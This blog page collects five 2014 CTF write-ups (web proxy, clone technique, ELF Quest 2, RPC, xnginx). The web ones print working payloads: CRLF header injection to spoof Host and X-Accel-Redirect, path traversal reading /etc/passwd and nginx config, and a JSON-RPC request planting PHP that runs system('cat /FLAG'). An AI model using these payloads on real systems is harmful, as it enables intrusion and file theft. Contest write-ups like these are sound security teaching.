A disturbing lack of taste. Just another WordPress site

24Feb/145

Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php

It has a GET parameter "url":

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=google.it

It prints the headers + part of the body. We can easly enter the admin page with:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/

but since the body isn't printed we can't see all the response. After a bit of testing it pointed out that a CRLF injection was possible so we can split the body with Range: header.

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.0%0D%0AHost:%20localhost%0D%0ARange:%20bytes=372-425%0D%0AConnection:%20close%0D%0A%0D%0A

<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Since it wants Host header to be "hackme" lets do it:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N

Razor4x

Filed under: Uncategorized 5 Comments
24Feb/140

Codegate CTF Preliminary 2014 – Clone Technique Writeup

The task gave us a binary that creates a maximum of 400 threads where each one is started with 3 arguments that differs every time a new child process is started. The last arguments is used as a "counter" and the first 2 is used as seed for generate the flag. We have to know which thread has correct arguments that lead us the flag. The routine that calculate the flag is at 0x401070. In this routine , as we said before, the function uses our 2 arguments we passed to the program at the start and do some math on them to generate a sequence that will be placed at ebp-4 (0x0012fecc). Now for find out which thread has correct values to print the flag just make a JMP before the RET of this function to somewhere in the binary were we can print the flag  such as a message box or write into a file.

http://postimg.org/image/kx1gogl9b/

As in the image, after the program return from 0x401070 in EAX still remain the address that points to the flag so we gonna jump to a place of memory where we previously placed our piece of asm code that will print the flag like 0x0040563a.

Now just run the program and see the result till a human readable text comes up.

Razor4x

Filed under: Uncategorized No Comments
10Feb/142

Olympic CTF Sochi 2014 – Elf Quest 2 Writeup

As task hints the challenge it is composed of three parts:

1)  restore the origianl ELF header that has been corrupted by placing some 'CC' in it comparing it with another ELF header that is known to be correct. (Corrupted part are for example SO/ABI part, version, class,...)

2) after restoring the program and running it will ask us for a passphrase used to decrypt some data in it. After it decrypts the block it will show up that is is another ELF header with something hidden in it.

3) like in the previous version of elf quest we have to find a way to extract some information from it. Now counting the number of times that each byte occurs like: 0x00 100 times or 0xff 5 times etc... we'll get another corrupted ELF header but this time it contains a small decryption routine that will prints out the flag: CTF{bf7475cb1733885d35b60e13bc2d7b8f}

Razor4x

Filed under: Uncategorized 2 Comments
10Feb/140

Olympic CTF Sochi 2014 – RPC Writeup

This challenge was about injecting JSON-RPC string that will be parsed by the server. After some investigation we found out that __construct and __wakeup method can be used and need the following parameters: log_dir, debug and state:

rpc_json_call={"jsonrpc": "2.0", "method": "__construct", "params":[1,2,3]}

We then immediatly tought pointing log_dir somewhere around our control like '/var/www' to try to see if some thing is uploaded:

rpc_json_call=[{"jsonrpc": "2.0", "method": "__construct", "params":{"log_dir":"/var/www/test.php","debug":1,"state":1}}]

but nothing happened. We then tought that our file is deleted after the termination of the script so we run a py script that loops request on /test.php and prints out the result in a race condition situation:

import requests

while 1:
r = requests.get("http://109.233.61.11:8880/test.php")
if r.status_code!=404:
print r.text

But even this didn't worked. So we tryed to send a second RPC request to the server with the first one:

rpc_json_call=[{"jsonrpc": "2.0", "method": "__construct", "params":{"log_dir":"/var/www/test.php","debug":1,"state":1}},{"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]

and this worked! We can see a serialized object of the state we sent ("state":1) in the file. So having the arbitrary control of the state and the ability to put also strings we can now inject PHP code into it:

rpc_json_call=[{"jsonrpc": "2.0", "method": "__construct", "params":{"log_dir":"/var/www/test.php","debug":1,"state":"<?php system('cat /FLAG');?>"}},{"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]

If you run this payload while our py script is running you will see that it will print the flag:

CTF{b15ffee30a117f418d1cede6faa57778}

nurfed, Razor4x

Filed under: Uncategorized No Comments
10Feb/140

Olympic CTF Sochi 2014 – xnginx Writeup

The task provide us a website where we can go trought some different outputs:

http://109.233.61.11:27280/news/?f=31-12-2013

http://109.233.61.11:27280/news/?f=01-01-2014

After testing a bit on that parameter it pointed out that there was a LFI there:

http://109.233.61.11:27280/news/?f=../../../etc/passwd

As challenge hints us, and by the way you can reache it from HTTP headers, the server running was nginx so we co ahead find its configuration file:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/nginx.conf

Now we can see that in "/etc/nginx/sites-enabled/" path there was the sites that nginx enabled to browse.

Opening the default one:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/sites-enabled/default

we can see an interesting thing:

location = /secret/flag {
root /home;
internal;
}

path for access the flag is http://109.233.61.11:27280/secret/flag but since its marked with "internal" we aren't able to access it. We'll be able to do that trought CRLF in "retpath" parameter

injecting X-Accel-Redirect for bypassing this:

http://109.233.61.11:27280/?retpath=/news/%0d%0aX-Accel-Redirect:%20/secret/flag

Flag: CTF{6e75d02b8e8329bb4b45c7dabd2e1da2}

Razor4x

Filed under: Uncategorized No Comments